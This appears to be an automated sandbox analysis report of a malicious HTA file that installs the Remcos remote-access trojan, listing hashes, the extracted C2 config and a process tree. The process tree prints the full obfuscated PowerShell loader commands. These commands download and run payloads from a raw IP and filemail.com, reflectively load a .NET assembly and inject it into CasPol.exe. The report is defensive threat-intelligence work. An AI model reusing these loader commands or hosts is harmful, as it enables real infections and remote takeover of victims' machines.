Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 08:27
Static task
static1
Behavioral task
behavioral1
Sample
thinkingbestthingswhichcomingetniretimegivenmegood.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
thinkingbestthingswhichcomingetniretimegivenmegood.hta
Resource
win10v2004-20241007-en
General
-
Target
thinkingbestthingswhichcomingetniretimegivenmegood.hta
-
Size
600KB
-
MD5
c24178318fab715f3b613fc11396ed80
-
SHA1
d6711bb536adde5cb961f7d1559fc287f4aa3d76
-
SHA256
70576f474296d70ab1182339945255eeed65d7f5e8b71b153a56b9e2c0478ec5
-
SHA512
f397726076afe79c0f2e00afd8ddd7bc90e47cdffd04a033552e9246039cf781bf08c1a1bfb49c056d853106f82d6d00826f7b4cf9752bba032def61bb0e7d71
-
SSDEEP
192:4dE6COljVxi5Dq4bm4i5Dq4gmXPi5Dq4oi5Dq4Umji5Dq4Jzt4kQ:b6COljV/zO7
Malware Config
Extracted
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
Extracted
remcos
RemoteHost
balalalala.duckdns.org:6946
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-316C3Y
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
Processes:
POWErsHElL.Exepowershell.exeflow pid process 13 3600 POWErsHElL.Exe 35 4736 powershell.exe 43 4736 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 864 powershell.exe 4736 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
POWErsHElL.Exepowershell.exepid process 3600 POWErsHElL.Exe 836 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4736 set thread context of 1064 4736 powershell.exe CasPol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WScript.exepowershell.exemshta.exePOWErsHElL.Exepowershell.exeCasPol.execsc.execvtres.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWErsHElL.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
Processes:
POWErsHElL.Exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings POWErsHElL.Exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
POWErsHElL.Exepowershell.exepowershell.exepowershell.exepid process 3600 POWErsHElL.Exe 3600 POWErsHElL.Exe 836 powershell.exe 836 powershell.exe 864 powershell.exe 864 powershell.exe 4736 powershell.exe 4736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
POWErsHElL.Exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3600 POWErsHElL.Exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
CasPol.exepid process 1064 CasPol.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
mshta.exePOWErsHElL.Execsc.exeWScript.exepowershell.exepowershell.exedescription pid process target process PID 2364 wrote to memory of 3600 2364 mshta.exe POWErsHElL.Exe PID 2364 wrote to memory of 3600 2364 mshta.exe POWErsHElL.Exe PID 2364 wrote to memory of 3600 2364 mshta.exe POWErsHElL.Exe PID 3600 wrote to memory of 836 3600 POWErsHElL.Exe powershell.exe PID 3600 wrote to memory of 836 3600 POWErsHElL.Exe powershell.exe PID 3600 wrote to memory of 836 3600 POWErsHElL.Exe powershell.exe PID 3600 wrote to memory of 3716 3600 POWErsHElL.Exe csc.exe PID 3600 wrote to memory of 3716 3600 POWErsHElL.Exe csc.exe PID 3600 wrote to memory of 3716 3600 POWErsHElL.Exe csc.exe PID 3716 wrote to memory of 3640 3716 csc.exe cvtres.exe PID 3716 wrote to memory of 3640 3716 csc.exe cvtres.exe PID 3716 wrote to memory of 3640 3716 csc.exe cvtres.exe PID 3600 wrote to memory of 1596 3600 POWErsHElL.Exe WScript.exe PID 3600 wrote to memory of 1596 3600 POWErsHElL.Exe WScript.exe PID 3600 wrote to memory of 1596 3600 POWErsHElL.Exe WScript.exe PID 1596 wrote to memory of 864 1596 WScript.exe powershell.exe PID 1596 wrote to memory of 864 1596 WScript.exe powershell.exe PID 1596 wrote to memory of 864 1596 WScript.exe powershell.exe PID 864 wrote to memory of 4736 864 powershell.exe powershell.exe PID 864 wrote to memory of 4736 864 powershell.exe powershell.exe PID 864 wrote to memory of 4736 864 powershell.exe powershell.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe PID 4736 wrote to memory of 1064 4736 powershell.exe CasPol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\thinkingbestthingswhichcomingetniretimegivenmegood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\wINdOwSpoweRshelL\v1.0\POWErsHElL.Exe"C:\Windows\sYStEM32\wINdOwSpoweRshelL\v1.0\POWErsHElL.Exe" "poWeRSHell.exE -EX BYpASS -nOp -W 1 -C dEViceCRedeNtIaLDEpLoymenT ; Iex($(iex('[sySTem.TExt.enCoDINg]'+[cHAR]58+[CHar]0x3a+'utf8.GetSTrING([SYsTem.CoNVERT]'+[chaR]0X3a+[cHar]0x3a+'FromBASE64StRINg('+[char]34+'JE5yakxDICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlZmluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpveSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVck5XY2FHYVpQLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENvR3FKbU9hdix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0JSVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS0JFbEZIZXQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ4S09Ld2IiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVYVUZJUUF2eCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTnJqTEM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE5Mi8xMjIvd2VjcmVhdGVkYmV0dGVydGhpbmdzZ29vZHdheWVudGlyZWxpZmVncmVhdHRvZ29iZXR0ZXJ0aGluZ3MudElGIiwiJEVudjpBUFBEQVRBXHdlY3JlYXRlZGJldHRlcnRoaW5nc2dvb2R3YXllbnRpcmVsaWZlZ3JlYXR0b2dvYmV0dGVydGhpLnZCcyIsMCwwKTtTdEFSdC1TTGVlcCgzKTtJSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcd2VjcmVhdGVkYmV0dGVydGhpbmdzZ29vZHdheWVudGlyZWxpZmVncmVhdHRvZ29iZXR0ZXJ0aGkudkJzIg=='+[cHar]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpASS -nOp -W 1 -C dEViceCRedeNtIaLDEpLoymenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kn1ju24\5kn1ju24.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86F3.tmp" "c:\Users\Admin\AppData\Local\Temp\5kn1ju24\CSC8D74313FAFEE4EA4B480D93375ED791B.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3640
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\wecreatedbetterthingsgoodwayentirelifegreattogobetterthi.vBs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoIChbc1RySU5nXSR2RXJCb3NFcHJFRkVSZW5jZSlbMSwzXSsnWCctam9pbicnKSgoKCdzOTBKaW1hJysnZ2VVcmwgPSBJZkpvaHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGknKycvZmlsZS9nZXQnKyc/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfMHhDeS14bDR0bnhsQVZiUTk1LWQnKyd2aVRLNWNBUmFOZCcrJ1FqYmIzbWV4ZndReksnKydtVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSWYnKydKbztzOTBKd2ViQ2xpZW50ID0nKycgTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtzOTBKaW1hZ2VCeXRlcyA9IHM5MEp3ZWJDbGllbnQuRG93bmxvYWREYXRhKHM5MEppbWFnZVVybCk7czkwSmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHM5MEppbWFnZUJ5dGVzKTtzOTBKc3RhcnRGbGFnID0gSWZKbzw8QkFTRTY0X1NUQVJUPj5JZkpvO3M5MEplbmRGbGFnID0gSWZKbzw8QkFTRTY0X0VORD4+SWZKbztzOTBKc3RhcnRJbmRleCA9IHM5MEppbWFnZVRleHQuSW5kZXhPZihzOTBKc3RhcnRGbGFnKTtzOTBKZW5kSW5kZXggPSBzOTBKaW1hZ2VUZXh0LkluZGV4T2YoczkwSmVuZEZsYWcpO3M5MEpzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgczkwSmVuZEluZGV4IC1ndCBzOTBKc3RhcnRJbmRleDtzOTBKc3RhcnRJbmRleCArPSBzOTBKc3RhcnRGbGFnLkxlbmd0aDtzOTBKYmFzZTY0TGVuZ3RoID0gczkwSmVuZEluZGV4IC0gczkwSnN0YXJ0SW5kZXg7czkwSmJhc2U2NENvbW1hbicrJ2QgPSBzOTBKaW1hZ2VUZXh0LlN1JysnYnN0cmluZyhzOTBKc3RhcnRJbmRleCwgczkwSmJhc2U2NExlbmd0aCk7czkwJysnSmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKHM5MEpiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdzRFIEZvckVhY2gtT2JqZWN0IHsgczkwSl8gfSlbLTEuLi0oczkwSmJhc2U2NENvbW1hbmQuTCcrJ2VuZ3RoKV07czkwSmNvbW1hbmRCJysneXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF0nKyc6OkZyb21CYXNlNjRTdHJpbmcoczkwSmJhc2U2NFJldmVyc2VkKTtzOTBKbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHM5MEpjb21tYW5kQnl0ZXMpO3M5MEp2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKElmSm9WQUlJZkpvKScrJztzOTBKdmFpTWV0aG9kLkludm9rZShzOScrJzBKbnVsbCwgQChJZkpvdHh0LlJGVlJFLzIyMS8yOTEuODcxLjY0Ljg5MS8vOnB0dGhJZkpvLCBJZkpvZGVzYXRpdmFkb0lmSm8sIElmSm9kZXNhdGl2YWRvSWZKbywgSWZKJysnb2Rlc2F0aXZhZG9JZkpvJysnLCBJZkpvQ2FzUG9sSWZKJysnbywgSWZKb2Rlc2F0aXZhZG9JZkpvLCBJJysnZkpvZGVzYXRpdmFkb0lmSm8sSWZKb2Rlc2F0aXZhZG9JZkpvLElmSm9kZXNhdGl2YWRvSWZKJysnbyxJZkpvZGVzYXRpdmFkb0lmSm8sSWZKb2Rlc2F0aXZhZG9JZkpvLElmSm9kZXNhdCcrJ2l2YWRvSScrJ2ZKbyxJZkpvMUlmJysnSm8sSWZKb2Rlc2F0aXZhZG9JZkpvKSk7JykgIC1DcmVQTGFjRSAnSWZKbycsW0NIYVJdMzktUmVQbEFDZSAnczkwSicsW0NIYVJdMzYtQ3JlUExhY0UgIChbQ0hhUl0xMTkrW0NIYVJdNTIrW0NIYVJdNjkpLFtDSGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( ([sTrINg]$vErBosEprEFERence)[1,3]+'X'-join'')((('s90Jima'+'geUrl = IfJohttps://3105.filemail.com/api'+'/file/get'+'?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-d'+'viTK5cARaNd'+'Qjbb3mexfwQzK'+'mTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c If'+'Jo;s90JwebClient ='+' New-Object System.Net.W'+'ebClient;s90JimageBytes = s90JwebClient.DownloadData(s90JimageUrl);s90JimageText = [System.Text.Encoding]::UTF8.GetString(s90JimageBytes);s90JstartFlag = IfJo<<BASE64_START>>IfJo;s90JendFlag = IfJo<<BASE64_END>>IfJo;s90JstartIndex = s90JimageText.IndexOf(s90JstartFlag);s90JendIndex = s90JimageText.IndexOf(s90JendFlag);s90JstartInde'+'x -ge 0 -and s90JendIndex -gt s90JstartIndex;s90JstartIndex += s90JstartFlag.Length;s90Jbase64Length = s90JendIndex - s90JstartIndex;s90Jbase64Comman'+'d = s90JimageText.Su'+'bstring(s90JstartIndex, s90Jbase64Length);s90'+'Jbase64Reversed = -join (s90Jbase64Command.ToCharArray'+'() w4E ForEach-Object { s90J_ })[-1..-(s90Jbase64Command.L'+'ength)];s90JcommandB'+'ytes = [Syste'+'m.Convert]'+'::FromBase64String(s90Jbase64Reversed);s90JloadedAssembly = [System.Reflection.Assembly]::Load(s90JcommandBytes);s90JvaiMethod = [dnlib.IO.Home].GetMethod(IfJoVAIIfJo)'+';s90JvaiMethod.Invoke(s9'+'0Jnull, @(IfJotxt.RFVRE/221/291.871.64.891//:ptthIfJo, IfJodesativadoIfJo, IfJodesativadoIfJo, IfJ'+'odesativadoIfJo'+', IfJoCasPolIfJ'+'o, IfJodesativadoIfJo, I'+'fJodesativadoIfJo,IfJodesativadoIfJo,IfJodesativadoIfJ'+'o,IfJodesativadoIfJo,IfJodesativadoIfJo,IfJodesat'+'ivadoI'+'fJo,IfJo1If'+'Jo,IfJodesativadoIfJo));') -CrePLacE 'IfJo',[CHaR]39-RePlACe 's90J',[CHaR]36-CrePLacE ([CHaR]119+[CHaR]52+[CHaR]69),[CHaR]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1064
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
12KB
MD5b3234bdaf41c6167547784ca3547fa56
SHA1d817d78c83a21ae6d9b12e3ccd842bf9d12863ba
SHA25671444f876dd48fe3c16e25344525a38f87b707ccaf9f0dcde35dfbcb9c54f64d
SHA5122346cd8ce35e5313fca115d843e5514ec4f63ea604457a6e62f1ddcecf756048d540dae22534370f0ac2055193e4c01d39afbe6b59044e4e6f42334ba792c740
-
Filesize
18KB
MD544cb3cd214e1c5ed750acbc179df1fd2
SHA19bcb0c19e59f5a6ae668c64c691bb0c6eb6dd589
SHA2569786a22225cf6836a3943d1e8223722e4bfa035987509c89060dc518f9b7305a
SHA5124898a5402a73af2a0696c77622943d29ebd0e40dce4bcb67bc288173b822083c498c2189711118df3d5b9f00f4372ed79ec1a79b285b1d88be64b7a40fd217eb
-
Filesize
3KB
MD5c10bc58182d5cb4416255628e041d299
SHA166c1dda5df5b4d3d0a602d05514ed876b42a8726
SHA256df891bb63dd6d0df8e9d28cef27a645ab46e21be873dde72454c73a15978d2e0
SHA5122b961eca4b5c94c9af0316e53722397008268d8f00419079694a23858c7b696c61b08aa1b9729f4fd15cb30aab150d05e09157778032dc46e2e614b974c91354
-
Filesize
1KB
MD55df07a23a2dd19320ea4f22b15b08d90
SHA1dc1c58b569c265a32865f8eb7db7d2d5957e172e
SHA256a2424116816f6c33c7553d65d4cac0ddf62545b3703b8fbe83a27b2a104dc70e
SHA512ae30d3c153ebbc9624c4bccba905987daad5e33a0f0c3945a5b06d6ca58889b09ef8f3768223715855de13deb96d31f53303f56de1874d9272cbb8f3d242330a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD566dea8976cdda98cc8301cb75c297156
SHA11c4404c8cc6c6c02df18ea7dc6519e7edad84c49
SHA256ccaf45b19838ab67444ad6df528545ffd72b7d68060b4fcedcfc2a1f7a855e3c
SHA51266235e9912a1cb62d6d6a997d2f8e56ee656fb1aae12499cc54a2773c2edd240c0e5bdec355caa65e035180a26e5f203234de00b61b2681a63c66770d1156a7f
-
Filesize
487B
MD5ec9211d8c72f21a987a7352367f9a790
SHA17c513a66a26f28514e820f65c7b0cc5f47966295
SHA256f16e7c3d9c844d3e5a58436c50ed9562b5c1ba9c7786c04c179514284716b136
SHA51281d9ab17eb0c2a1c96dd48c3a572c5548664e7bfeb07b819b83d50479f23f4c42d1278af6ae185b91ca2aecf4823be20d968e21b354f4de808b43d375be89976
-
Filesize
369B
MD589baddfcbe9ebf944f5068141dbb93cd
SHA1fc18649efdfea6723e75a92f7da29f6b9b4dad4c
SHA2563922f5e6034420dbcd789c7dd11b6454c4d263203ff6ec6cdb852695430fbd3b
SHA5124b6644ccb202cf6ebb22be598bcde7cdd6724009e55d58ce71f366c5a39a9d5a9d311b2ac452da89ab33cd5ea067b00e1d66a30925cef9d1cda116701c3d3434
-
Filesize
652B
MD5b5e5ef8f12c72b3f58ab747fec876a4f
SHA1d6a7d41b14b0519fb96ce7cc0f005c5585ed7d59
SHA2563aa282c649036582ddf99561cd0cddc8f29f0948e83f9541358da208e4451001
SHA5127bbb8022f941cbb04e19c3037acd5f339f0c0a05ae7b44b5d1bd92bab17caccece6b43b941dabc46cd50800bcdd5425e1168fed75c0ce065c8be13b3b0991584